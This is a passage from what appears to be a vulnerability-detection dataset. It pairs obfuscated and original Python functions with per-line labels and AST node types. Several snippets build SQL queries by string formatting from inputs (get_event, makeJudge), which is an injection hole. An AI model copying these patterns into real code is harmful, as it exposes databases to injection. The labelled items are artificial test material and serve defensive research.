"super().__init__(**self.serial_settings)\n",
"def FUNC_0(self, VAR_2=None, VAR_3=60):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_2 is None:\n",
"VAR_2 = self.sensors\n",
"if self.debug:\n",
"print('sensors:', VAR_2)\n",
"while not self.is_open:\n",
"self.flush()\n",
"self.open()\n",
"time.sleep(VAR_3)\n",
"for sen in VAR_2:\n",
"self.flushInput()\n",
"yield 'NULL'\n",
"VAR_4 = self.cmd.replace('{sensor}', sen)\n",
"VAR_4 = bytes(VAR_4, 'utf8')\n",
"if self.debug:\n",
"print('serial cmd:', VAR_4)\n",
"self.write(VAR_4)\n",
"if 'ack' in self.settings and 'enq' in self.settings:\n",
"VAR_6 = codecs.decode(self.settings['ack'], 'unicode-escape')\n",
"VAR_5 = self.readline()\n",
"VAR_5 = self.readline()\n",
"if self.debug:\n",
"if self.debug:\n",
"print(VAR_5)\n",
"VAR_5 = VAR_5.strip().decode('utf-8')\n",
"print('acknowledgement:', VAR_5, bytes(VAR_6, 'utf8'))\n",
"if VAR_5 == bytes(VAR_6, 'utf8'):\n",
"if self.regex is not None:\n",
"VAR_8 = codecs.decode(self.settings['enq'], 'unicode-escape')\n",
"VAR_7 = re.search(self.regex, VAR_5)\n",
"yield VAR_5\n",
"self.write(bytes(VAR_8, 'utf8'))\n",
"VAR_5 = VAR_7.group(1)\n"
] | [
"\"\"\"\nCreated on Mon Jan 1 21:38:13 2018\n\n@author: Adam\n\"\"\"\n",
"import codecs\n",
"import re\n",
"import time\n",
"import warnings\n",
"from serial import SerialException, Serial\n",
"from .tools import get_serial_settings\n",
"from .base import Device\n",
"\"\"\" communication with a serial device \"\"\"\n",
"def __init__(self, settings, debug=False):...\n",
"self.settings = settings\n",
"self.serial_settings = get_serial_settings(settings)\n",
"self.sensors = settings.get('sensors', None)\n",
"self.cmd = codecs.decode(self.settings['cmd'], 'unicode-escape')\n",
"self.regex = settings.get('regex', None)\n",
"self.debug = debug\n",
"if self.debug:\n",
"print('serial settings:', self.serial_settings)\n",
"super().__init__(**self.serial_settings)\n",
"def read_data(self, sensors=None, reset_wait=60):...\n",
"\"\"\"docstring\"\"\"\n",
"if sensors is None:\n",
"sensors = self.sensors\n",
"if self.debug:\n",
"print('sensors:', sensors)\n",
"while not self.is_open:\n",
"self.flush()\n",
"self.open()\n",
"time.sleep(reset_wait)\n",
"for sen in sensors:\n",
"self.flushInput()\n",
"yield 'NULL'\n",
"serial_cmd = self.cmd.replace('{sensor}', sen)\n",
"serial_cmd = bytes(serial_cmd, 'utf8')\n",
"if self.debug:\n",
"print('serial cmd:', serial_cmd)\n",
"self.write(serial_cmd)\n",
"if 'ack' in self.settings and 'enq' in self.settings:\n",
"ack = codecs.decode(self.settings['ack'], 'unicode-escape')\n",
"response = self.readline()\n",
"response = self.readline()\n",
"if self.debug:\n",
"if self.debug:\n",
"print(response)\n",
"response = response.strip().decode('utf-8')\n",
"print('acknowledgement:', response, bytes(ack, 'utf8'))\n",
"if response == bytes(ack, 'utf8'):\n",
"if self.regex is not None:\n",
"enq = codecs.decode(self.settings['enq'], 'unicode-escape')\n",
"match = re.search(self.regex, response)\n",
"yield response\n",
"self.write(bytes(enq, 'utf8'))\n",
"response = match.group(1)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Expr'",
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"FunctionDef'",
"Docstring",
"Condition",
"Assign'",
"Condition",
"Expr'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"For",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Condition",
"Condition",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'"
] |
[
"def FUNC_3(self, VAR_8):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_19 = self._cliq_get_cluster_info(VAR_8)\n",
"VAR_20 = []\n",
"for vip in VAR_19.findall('response/cluster/vip'):\n",
"VAR_20.append(vip.attrib.get('ipAddress'))\n",
"if len(VAR_20) == 1:\n",
"return VAR_20[0]\n",
"VAR_21 = etree.tostring(VAR_19)\n",
"VAR_22 = _(\n 'Unexpected number of virtual ips for cluster %(cluster_name)s. Result=%(_xml)s'\n ) % {'cluster_name': VAR_8, '_xml': VAR_21}\n"
] | [
"def _cliq_get_cluster_vip(self, cluster_name):...\n",
"\"\"\"docstring\"\"\"\n",
"cluster_xml = self._cliq_get_cluster_info(cluster_name)\n",
"vips = []\n",
"for vip in cluster_xml.findall('response/cluster/vip'):\n",
"vips.append(vip.attrib.get('ipAddress'))\n",
"if len(vips) == 1:\n",
"return vips[0]\n",
"_xml = etree.tostring(cluster_xml)\n",
"msg = _(\n 'Unexpected number of virtual ips for cluster %(cluster_name)s. Result=%(_xml)s'\n ) % {'cluster_name': cluster_name, '_xml': _xml}\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"For",
"Expr'",
"Condition",
"Return'",
"Assign'",
"Assign'"
] |
[
"def FUNC_39(self, VAR_20):...\n",
"for VAR_14 in self.list_properties.keys():\n",
"if self.is_relation(VAR_14):\n",
"if VAR_20 == self.get_related_model(VAR_14):\n",
"return VAR_14\n"
] | [
"def get_related_fk(self, model):...\n",
"for col_name in self.list_properties.keys():\n",
"if self.is_relation(col_name):\n",
"if model == self.get_related_model(col_name):\n",
"return col_name\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"For",
"Condition",
"Condition",
"Return'"
] |
[
"def FUNC_11(self, VAR_9):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_8 = VAR_9.args.get('csessid')[0]\n",
"VAR_20 = self.sessionhandler.sessions_from_csessid(VAR_8)[0]\n",
"self.client_disconnect(VAR_8)\n",
"return '\"\"'\n",
"VAR_20.sessionhandler.disconnect(VAR_20)\n"
] | [
"def mode_close(self, request):...\n",
"\"\"\"docstring\"\"\"\n",
"csessid = request.args.get('csessid')[0]\n",
"sess = self.sessionhandler.sessions_from_csessid(csessid)[0]\n",
"self.client_disconnect(csessid)\n",
"return '\"\"'\n",
"sess.sessionhandler.disconnect(sess)\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Expr'",
"Return'",
"Expr'"
] |
[
"def FUNC_50(self):...\n",
"self.compilation_ko('true;')\n"
] | [
"def test_test_outside_control(self):...\n",
"self.compilation_ko('true;')\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_0(VAR_0):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_3 = []\n",
"for i in range(VAR_0):\n",
"VAR_9 = mock.MagicMock(VAR_8='AndroidDevice', VAR_4=str(i), h_port=None)\n",
"return VAR_3\n",
"VAR_3.append(VAR_9)\n"
] | [
"def get_mock_ads(num):...\n",
"\"\"\"docstring\"\"\"\n",
"ads = []\n",
"for i in range(num):\n",
"ad = mock.MagicMock(name='AndroidDevice', serial=str(i), h_port=None)\n",
"return ads\n",
"ads.append(ad)\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"For",
"Assign'",
"Return'",
"Expr'"
] |
[
"def FUNC_18(VAR_25):...\n",
"VAR_22[VAR_25] = VAR_20\n",
"VAR_23[VAR_25] = VAR_20\n",
"VAR_20 += 1\n",
"VAR_21.append(VAR_25)\n",
"VAR_24[VAR_25] = True\n",
"for VAR_34 in self.successors[VAR_25]:\n",
"if VAR_22[VAR_34] == None:\n",
"VAR_46 = set()\n",
"FUNC_18(VAR_34)\n",
"if VAR_24[VAR_34]:\n",
"if VAR_23[VAR_25] == VAR_22[VAR_25]:\n",
"VAR_23[VAR_25] = min(VAR_23[VAR_25], VAR_23[VAR_34])\n",
"VAR_23[VAR_25] = min(VAR_23[VAR_25], VAR_22[VAR_34])\n",
"while True:\n",
"return VAR_46\n",
"VAR_34 = VAR_21.pop()\n",
"VAR_24[VAR_34] = False\n",
"VAR_46.add(VAR_34)\n",
"if VAR_25 == VAR_34:\n"
] | [
"def strong_connect(v):...\n",
"indices[v] = index\n",
"lowlink[v] = index\n",
"index += 1\n",
"S.append(v)\n",
"onstack[v] = True\n",
"for w in self.successors[v]:\n",
"if indices[w] == None:\n",
"component = set()\n",
"strong_connect(w)\n",
"if onstack[w]:\n",
"if lowlink[v] == indices[v]:\n",
"lowlink[v] = min(lowlink[v], lowlink[w])\n",
"lowlink[v] = min(lowlink[v], indices[w])\n",
"while True:\n",
"return component\n",
"w = S.pop()\n",
"onstack[w] = False\n",
"component.add(w)\n",
"if v == w:\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"AugAssign'",
"Expr'",
"Assign'",
"For",
"Condition",
"Assign'",
"Expr'",
"Condition",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Return'",
"Assign'",
"Assign'",
"Expr'",
"Condition"
] |
[
"def FUNC_32(self, VAR_81):...\n",
"def FUNC_39(VAR_101):...\n",
"VAR_101.shellcmd = VAR_81\n",
"return VAR_101\n"
] | [
"def shellcmd(self, cmd):...\n",
"def decorate(ruleinfo):...\n",
"ruleinfo.shellcmd = cmd\n",
"return ruleinfo\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_13(self, VAR_9, VAR_10=None, VAR_11=None, VAR_20=''):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_28 = self.get_and_check_task(VAR_9, VAR_10, VAR_11)\n",
"VAR_31 = {'all': 'all.zip', 'geotiff': os.path.join('odm_orthophoto',\n 'odm_orthophoto.tif'), 'las': os.path.join('odm_georeferencing',\n 'odm_georeferenced_model.ply.las'), 'ply': os.path.join(\n 'odm_georeferencing', 'odm_georeferenced_model.ply'), 'csv': os.path.\n join('odm_georeferencing', 'odm_georeferenced_model.csv')}\n",
"if VAR_20 in VAR_31:\n",
"VAR_33 = VAR_28.assets_path(VAR_31[VAR_20])\n",
"if not os.path.exists(VAR_33):\n",
"VAR_34 = os.path.basename(VAR_33)\n",
"VAR_35 = open(VAR_33, 'rb')\n",
"VAR_36 = HttpResponse(FileWrapper(VAR_35), content_type=mimetypes.\n guess_type(asset_filename)[0] or 'application/zip')\n",
"VAR_36['Content-Disposition'] = 'attachment; filename={}'.format(VAR_34)\n",
"return VAR_36\n"
] | [
"def get(self, request, pk=None, project_pk=None, asset=''):...\n",
"\"\"\"docstring\"\"\"\n",
"task = self.get_and_check_task(request, pk, project_pk)\n",
"allowed_assets = {'all': 'all.zip', 'geotiff': os.path.join(\n 'odm_orthophoto', 'odm_orthophoto.tif'), 'las': os.path.join(\n 'odm_georeferencing', 'odm_georeferenced_model.ply.las'), 'ply': os.\n path.join('odm_georeferencing', 'odm_georeferenced_model.ply'), 'csv':\n os.path.join('odm_georeferencing', 'odm_georeferenced_model.csv')}\n",
"if asset in allowed_assets:\n",
"asset_path = task.assets_path(allowed_assets[asset])\n",
"if not os.path.exists(asset_path):\n",
"asset_filename = os.path.basename(asset_path)\n",
"file = open(asset_path, 'rb')\n",
"response = HttpResponse(FileWrapper(file), content_type=mimetypes.\n guess_type(asset_filename)[0] or 'application/zip')\n",
"response['Content-Disposition'] = 'attachment; filename={}'.format(\n asset_filename)\n",
"return response\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_5(self, VAR_12):...\n",
"VAR_14 = 'string'.format(VAR_12)\n",
"self.cur.execute(VAR_14)\n",
"return self.cur.fetchall()\n"
] | [
"def get_event(self, event_id):...\n",
"sql = (\n \"\"\"SELECT title, description, start_time, time_zone, (\n SELECT GROUP_CONCAT(DISTINCT username)\n FROM user_event\n WHERE event_id = {0}\n AND user_event.attending = 1)\n AS accepted, (\n SELECT GROUP_CONCAT(DISTINCT username)\n FROM user_event\n WHERE event_id = {0}\n AND user_event.attending = 0)\n AS declined\n FROM events\n WHERE event_id = {0};\n \"\"\"\n .format(event_id))\n",
"self.cur.execute(sql)\n",
"return self.cur.fetchall()\n"
] | [
0,
4,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Expr'",
"Return'"
] |
[
"def FUNC_23(self, *VAR_69, **VAR_70):...\n",
"def FUNC_39(VAR_101):...\n",
"VAR_101.output = VAR_69, VAR_70\n",
"return VAR_101\n"
] | [
"def output(self, *paths, **kwpaths):...\n",
"def decorate(ruleinfo):...\n",
"ruleinfo.output = paths, kwpaths\n",
"return ruleinfo\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_3(self, VAR_8):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_19 = self._cliq_get_cluster_info(VAR_8)\n",
"VAR_20 = []\n",
"for vip in VAR_19.findall('response/cluster/vip'):\n",
"VAR_20.append(vip.attrib.get('ipAddress'))\n",
"if len(VAR_20) == 1:\n",
"return VAR_20[0]\n",
"VAR_21 = etree.tostring(VAR_19)\n",
"VAR_22 = _(\n 'Unexpected number of virtual ips for cluster %(cluster_name)s. Result=%(_xml)s'\n ) % {'cluster_name': VAR_8, '_xml': VAR_21}\n"
] | [
"def _cliq_get_cluster_vip(self, cluster_name):...\n",
"\"\"\"docstring\"\"\"\n",
"cluster_xml = self._cliq_get_cluster_info(cluster_name)\n",
"vips = []\n",
"for vip in cluster_xml.findall('response/cluster/vip'):\n",
"vips.append(vip.attrib.get('ipAddress'))\n",
"if len(vips) == 1:\n",
"return vips[0]\n",
"_xml = etree.tostring(cluster_xml)\n",
"msg = _(\n 'Unexpected number of virtual ips for cluster %(cluster_name)s. Result=%(_xml)s'\n ) % {'cluster_name': cluster_name, '_xml': _xml}\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"For",
"Expr'",
"Condition",
"Return'",
"Assign'",
"Assign'"
] |
[
"def __init__(self, VAR_1=None, VAR_2=None, VAR_3=None, VAR_4=None, VAR_5=...\n",
"\"\"\"docstring\"\"\"\n",
"self._rules = OrderedDict()\n",
"self.first_rule = None\n",
"self._workdir = None\n",
"self.overwrite_workdir = VAR_6\n",
"self.workdir_init = os.path.abspath(os.curdir)\n",
"self._ruleorder = Ruleorder()\n",
"self._localrules = set()\n",
"self.linemaps = dict()\n",
"self.rule_count = 0\n",
"self.basedir = os.path.dirname(VAR_1)\n",
"self.snakefile = os.path.abspath(VAR_1)\n",
"self.snakemakepath = VAR_2\n",
"self.included = []\n",
"self.included_stack = []\n",
"self.jobscript = VAR_3\n",
"self.persistence = None\n",
"self.global_resources = None\n",
"self.globals = globals()\n",
"self._subworkflows = dict()\n",
"self.overwrite_shellcmd = VAR_4\n",
"self.overwrite_config = VAR_5\n",
"self.overwrite_configfile = VAR_7\n",
"self.config_args = VAR_8\n",
"self._onsuccess = lambda log: None\n",
"self._onerror = lambda log: None\n",
"self.debug = VAR_9\n",
"VAR_85 = dict()\n",
"VAR_85.update(self.overwrite_config)\n",
"VAR_86 = CLASS_3()\n"
] | [
"def __init__(self, snakefile=None, snakemakepath=None, jobscript=None,...\n",
"\"\"\"docstring\"\"\"\n",
"self._rules = OrderedDict()\n",
"self.first_rule = None\n",
"self._workdir = None\n",
"self.overwrite_workdir = overwrite_workdir\n",
"self.workdir_init = os.path.abspath(os.curdir)\n",
"self._ruleorder = Ruleorder()\n",
"self._localrules = set()\n",
"self.linemaps = dict()\n",
"self.rule_count = 0\n",
"self.basedir = os.path.dirname(snakefile)\n",
"self.snakefile = os.path.abspath(snakefile)\n",
"self.snakemakepath = snakemakepath\n",
"self.included = []\n",
"self.included_stack = []\n",
"self.jobscript = jobscript\n",
"self.persistence = None\n",
"self.global_resources = None\n",
"self.globals = globals()\n",
"self._subworkflows = dict()\n",
"self.overwrite_shellcmd = overwrite_shellcmd\n",
"self.overwrite_config = overwrite_config\n",
"self.overwrite_configfile = overwrite_configfile\n",
"self.config_args = config_args\n",
"self._onsuccess = lambda log: None\n",
"self._onerror = lambda log: None\n",
"self.debug = debug\n",
"config = dict()\n",
"config.update(self.overwrite_config)\n",
"rules = Rules()\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'"
] |
[
"def FUNC_6(self):...\n",
"if not (VAR_101.default_sr or VAR_101.user_is_loggedin and VAR_101.site.\n",
"return False\n",
"return True\n"
] | [
"def run(self):...\n",
"if not (c.default_sr or c.user_is_loggedin and c.site.can_submit(c.user)):\n",
"return False\n",
"return True\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Return'"
] |
[
"def __eq__(self, VAR_25):...\n",
"VAR_0 = VAR_25._file if isinstance(VAR_25, CLASS_0) else VAR_25\n",
"return self._file == VAR_0\n"
] | [
"def __eq__(self, other):...\n",
"f = other._file if isinstance(other, _IOFile) else other\n",
"return self._file == f\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_12(VAR_10, VAR_8):...\n",
"if not VAR_8 in VAR_10:\n",
"return None\n",
"return VAR_10[VAR_8]\n"
] | [
"def get_safe_val(src, name):...\n",
"if not name in src:\n",
"return None\n",
"return src[name]\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Return'"
] |
[
"\"\"\"string\"\"\"\n",
"import sys\n",
"import citest.aws_testing as aws\n",
"import citest.json_contract as jc\n",
"import citest.service_testing as st\n",
"import spinnaker_testing as sk\n",
"import spinnaker_testing.kato as kato\n",
"\"\"\"string\"\"\"\n",
"VAR_0 = ''\n",
"@classmethod...\n",
"\"\"\"docstring\"\"\"\n",
"return kato.new_agent(VAR_2)\n"
] | [
"\"\"\"\nTests to see if CloudDriver/Kato can interoperate with Amazon Web Services.\n\nSample Usage:\n Assuming you have created $PASSPHRASE_FILE (which you should chmod 400):\n and $CITEST_ROOT points to the root directory of this repository\n (which is . if you execute this from the root)\n and $AWS_PROFILE is the name of the aws_cli profile for authenticating\n to observe aws resources:\n\n This first command would be used if Spinnaker itself was deployed on GCE.\n The test needs to talk to GCE to get to spinnaker (using the gce_* params)\n then talk to AWS (using the aws_profile with the aws cli program) to\n verify Spinnaker had the right effects on AWS.\n\n PYTHONPATH=$CITEST_ROOT:$CITEST_ROOT/spinnaker python $CITEST_ROOT/spinnaker/spinnaker_system/aws_kato_test.py --gce_ssh_passphrase_file=$PASSPHRASE_FILE --gce_project=$PROJECT --gce_zone=$GCE_ZONE --gce_instance=$INSTANCE --test_aws_zone=$AWS_ZONE --aws_profile=$AWS_PROFILE\n\n or\n\n This second command would be used if Spinnaker itself was deployed some\n place reachable through a direct IP connection. It could be, but is not\n necessarily deployed on GCE. It is similar to above except it does not\n need to go through GCE and its firewalls to locate the actual IP endpoints\n rather those are already known and accessible.\n\n PYTHONPATH=$CITEST_ROOT:$CITEST_ROOT/spinnaker python $CITEST_ROOT/spinnaker/spinnaker_system/aws_kato_test.py --native_hostname=host-running-kato\n --test_aws_zone=$AWS_ZONE --aws_profile=$AWS_PROFILE\n\n Note that the $AWS_ZONE is not directly used, rather it is a standard\n parameter being used to infer the region. The test is going to pick\n some different availability zones within the region in order to test kato.\n These are currently hardcoded in.\n\"\"\"\n",
"import sys\n",
"import citest.aws_testing as aws\n",
"import citest.json_contract as jc\n",
"import citest.service_testing as st\n",
"import spinnaker_testing as sk\n",
"import spinnaker_testing.kato as kato\n",
"\"\"\"Defines the scenario for the test.\n\n This scenario defines the different test operations.\n We're going to:\n Create a Load Balancer\n Delete a Load Balancer\n \"\"\"\n",
"__use_lb_name = ''\n",
"@classmethod...\n",
"\"\"\"docstring\"\"\"\n",
"return kato.new_agent(bindings)\n"
] | [
0,
0,
0,
1,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Expr'",
"Assign'",
"Condition",
"Docstring",
"Return'"
] |
[
"def __init__(self, VAR_10, VAR_11=None):...\n",
"if VAR_11 is None:\n",
"VAR_11 = 'http://localhost:8888/'\n",
"self.browser = VAR_10\n",
"self.base_url = VAR_11\n",
"self.outcome = None\n",
"self.start_time = None\n",
"self.stop_time = None\n",
"self.duration = None\n",
"self.exception_data = None\n",
"self.url = None\n",
"self.data = None\n",
"self.files = None\n",
"self.status_code = None\n",
"self.response = None\n",
"self.res_data = None\n",
"self.redirected_to = None\n"
] | [
"def __init__(self, browser, base_url=None):...\n",
"if base_url is None:\n",
"base_url = 'http://localhost:8888/'\n",
"self.browser = browser\n",
"self.base_url = base_url\n",
"self.outcome = None\n",
"self.start_time = None\n",
"self.stop_time = None\n",
"self.duration = None\n",
"self.exception_data = None\n",
"self.url = None\n",
"self.data = None\n",
"self.files = None\n",
"self.status_code = None\n",
"self.response = None\n",
"self.res_data = None\n",
"self.redirected_to = None\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'"
] |
[
"def FUNC_7(self):...\n",
"\"\"\"docstring\"\"\"\n",
"self.update()\n",
"return self.data.keys()\n"
] | [
"def get_module_names(self):...\n",
"\"\"\"docstring\"\"\"\n",
"self.update()\n",
"return self.data.keys()\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Expr'",
"Return'"
] |
[
"def FUNC_6(self, VAR_44, VAR_50):...\n",
"if not FUNC_2(VAR_44):\n",
"return self.error()\n",
"if VAR_50 != VAR_44:\n",
"return self.error(errors.BAD_PASSWORD_MATCH)\n",
"return VAR_44\n"
] | [
"def run(self, password, verify):...\n",
"if not chkpass(password):\n",
"return self.error()\n",
"if verify != password:\n",
"return self.error(errors.BAD_PASSWORD_MATCH)\n",
"return password\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Condition",
"Return'",
"Return'"
] |
[
"def FUNC_12(self, VAR_7, VAR_8):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_12 = self.tid_tag_count(VAR_7)\n",
"VAR_13 = [VAR_3 for VAR_3 in VAR_7 if VAR_12[VAR_3] >= VAR_8]\n",
"return VAR_13\n"
] | [
"def filter_tags(self, tids, min_tags):...\n",
"\"\"\"docstring\"\"\"\n",
"count_dict = self.tid_tag_count(tids)\n",
"tids_filtered = [tid for tid in tids if count_dict[tid] >= min_tags]\n",
"return tids_filtered\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Return'"
] |
[
"import psycopg2\n",
"VAR_0 = 'forum'\n",
"def FUNC_0():...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_2 = psycopg2.connect(database=DBNAME)\n",
"VAR_3 = VAR_2.cursor()\n",
"VAR_3.execute('select content,time from posts order by time desc')\n",
"return VAR_3.fetchall()\n"
] | [
"import psycopg2\n",
"DBNAME = 'forum'\n",
"def get_posts():...\n",
"\"\"\"docstring\"\"\"\n",
"db = psycopg2.connect(database=DBNAME)\n",
"c = db.cursor()\n",
"c.execute('select content,time from posts order by time desc')\n",
"return c.fetchall()\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"Assign'",
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Expr'",
"Return'"
] |
[
"def FUNC_0(self):...\n",
"self.reg = self.eng.allocate_qureg(self.wires)\n"
] | [
"def reset(self):...\n",
"self.reg = self.eng.allocate_qureg(self.wires)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Assign'"
] |
[
"def FUNC_3(VAR_3):...\n",
"return re.split('\\\\s*<br */>\\\\s*', VAR_3, flags=re.IGNORECASE)\n"
] | [
"def split_br(text):...\n",
"return re.split('\\\\s*<br */>\\\\s*', text, flags=re.IGNORECASE)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_3(VAR_11):...\n",
"VAR_3.execute(\n \"UPDATE players SET Judge = 1 WHERE Name = '%s' COLLATE NOCASE\" % VAR_11)\n",
"VAR_2.commit()\n"
] | [
"def makeJudge(judge):...\n",
"db.execute(\"UPDATE players SET Judge = 1 WHERE Name = '%s' COLLATE NOCASE\" %\n judge)\n",
"database.commit()\n"
] | [
0,
4,
0
] | [
"FunctionDef'",
"Expr'",
"Expr'"
] |
[
"def FUNC_0(self, VAR_11):...\n",
""
] | [
"def add_tag_by_name(self, tagname):...\n",
""
] | [
0,
0
] | [
"FunctionDef'",
"Condition"
] |
[
"@utils.synchronized('3par', external=True)...\n",
"self.common.client_login()\n",
"VAR_19 = self.common.create_cloned_volume(VAR_6, VAR_7)\n",
"self.common.client_logout()\n",
"return {'metadata': VAR_19}\n"
] | [
"@utils.synchronized('3par', external=True)...\n",
"self.common.client_login()\n",
"new_vol = self.common.create_cloned_volume(volume, src_vref)\n",
"self.common.client_logout()\n",
"return {'metadata': new_vol}\n"
] | [
0,
0,
0,
0,
0
] | [
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Return'"
] |
[
"def FUNC_8(self, VAR_15):...\n",
"VAR_32 = 1.0\n",
"VAR_33 = 'GB'\n",
"if VAR_15.endswith('MB'):\n",
"VAR_32 = 1.0 / 1024\n",
"if VAR_15.endswith('TB'):\n",
"VAR_33 = 'MB'\n",
"VAR_32 = 1.0 * 1024\n",
"return VAR_32 * float(VAR_15.partition(VAR_33)[0])\n",
"VAR_33 = 'TB'\n"
] | [
"def _get_space_in_gb(self, val):...\n",
"scale = 1.0\n",
"part = 'GB'\n",
"if val.endswith('MB'):\n",
"scale = 1.0 / 1024\n",
"if val.endswith('TB'):\n",
"part = 'MB'\n",
"scale = 1.0 * 1024\n",
"return scale * float(val.partition(part)[0])\n",
"part = 'TB'\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Return'",
"Assign'"
] |
[
"@tornado.web.asynchronous...\n",
""
] | [
"@tornado.web.asynchronous...\n",
""
] | [
0,
0
] | [
"Condition",
"Condition"
] |
[
"def FUNC_4(self):...\n",
"self.driver._eql_execute = self.mox.CreateMock(self.driver._eql_execute)\n",
"VAR_1 = {'name': self.volume_name, 'size': 1, 'id': self.volid}\n",
"self.driver._eql_execute('volume', 'select', VAR_1['name'], 'show').AndRaise(\n processutils.ProcessExecutionError(stdout=\n \"\"\"% Error ..... does not exist.\n\"\"\"))\n",
"self.mox.ReplayAll()\n",
"self.driver.delete_volume(VAR_1)\n"
] | [
"def test_delete_absent_volume(self):...\n",
"self.driver._eql_execute = self.mox.CreateMock(self.driver._eql_execute)\n",
"volume = {'name': self.volume_name, 'size': 1, 'id': self.volid}\n",
"self.driver._eql_execute('volume', 'select', volume['name'], 'show').AndRaise(\n processutils.ProcessExecutionError(stdout=\n \"\"\"% Error ..... does not exist.\n\"\"\"))\n",
"self.mox.ReplayAll()\n",
"self.driver.delete_volume(volume)\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'"
] |
[
"def FUNC_0(self, VAR_0):...\n",
"VAR_3 = VAR_0.cookies.get('XSRF-TOKEN')\n",
"if VAR_3:\n",
"self.xsrf_token = VAR_3\n"
] | [
"def _store_xsrf_token(self, response):...\n",
"xsrf_token = response.cookies.get('XSRF-TOKEN')\n",
"if xsrf_token:\n",
"self.xsrf_token = xsrf_token\n"
] | [
0,
5,
5,
5
] | [
"FunctionDef'",
"Assign'",
"Condition",
"Assign'"
] |
[
"import sqlite3\n",
"import os.path\n",
"from cpwrap import CFG\n",
"import random\n",
"import string\n",
"def FUNC_0():...\n",
"VAR_0 = sqlite3.connect(CFG('dbname'))\n",
"return VAR_0, VAR_0.cursor()\n"
] | [
"import sqlite3\n",
"import os.path\n",
"from cpwrap import CFG\n",
"import random\n",
"import string\n",
"def connectDB():...\n",
